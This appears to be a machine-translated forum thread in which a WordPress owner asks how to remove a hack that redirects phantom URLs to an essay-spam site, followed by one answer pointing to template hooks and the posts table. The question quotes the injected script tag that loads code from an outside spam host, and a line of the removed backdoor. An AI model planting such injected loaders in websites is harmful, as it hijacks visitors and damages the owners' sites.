我的wordpress网站最近遭到黑客入侵,我已经清理了留在那里的后门脚本,但似乎有某种虚拟网址根本不存在于数据库中但是如果我键入的话它进入了它打开的网站。
例如:
mysite.com/needs-more-tuition
然而,当页面打开时,它不是404页面而是我看到在HTML甚至完全生成之前运行的js脚本,并且页面重定向到阴暗的在线学费作业网站。
我看起来高低,甚至已经确定了javascript代码,但它无法在wordpress网站安装中找到它,也无法在主题或插件文件中找到它。
我在这里有点困惑,并且不知道在哪里看 - 从我的理解它在页面的开始HTML标记之前回显javascript - 所以它在标题编译之前运行。 / p>
我应该在哪里寻找这个?我需要清理它。谷歌已经对我的网站进行了处罚,同时我还有一个即将到来的占位符。
这是我的htaccess文件:
# BEGIN WordPress
<IfModule mod_rewrite.c>
RewriteEngine On
RewriteBase /
RewriteRule ^index\.php$ - [L]
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteRule . /index.php [L]
</IfModule>
# END WordPress
一切似乎都很正常 - 我实际上删除了代码令人厌恶的al文件:
if(isset($_GET['bot']))
Urlwise我现在有一个html文件可以绕过index.php。
phanton url在我的数据库中没有位置,但奇怪的是页面上有内容,因为它是一个普通的wordpress帖子。但是在页面的html中,即使在打开html标记之前,也会在文件顶部添加followng javascript片段:
<nofollow><noindex><script src="http://essay-oneday.com/?jquery&source=mywebsite.com&keyword=introduction to a film essay"></script></noindex></nofollow><!DOCTYPE html>
答案 0 :(得分:0)
看到你的问题,我想起了几件事。因为你说你的页面在html渲染之前重定向到另一个站点,这可能意味着这可能是受感染的htaccess的结果。如果没有那么这可能是一个自定义模板注入。寻找template_include和template_redirect行动。这个入侵者可能会非常小心,不要留下任何needs-more-tution部分的痕迹。我建议你主要在wp_posts表中查找数据库中的这个文本。一种可能性是这是一个页/帖子。然后在template_redirect或template_include挂钩中使用ID来检查当前页面,然后包含此js代码以重定向到url。另一件事。请仔细注意首先发生此重定向的url。您还应该在代码和数据库中查找该URL。毕竟这完全是假设的。没有看到它真的很难评论。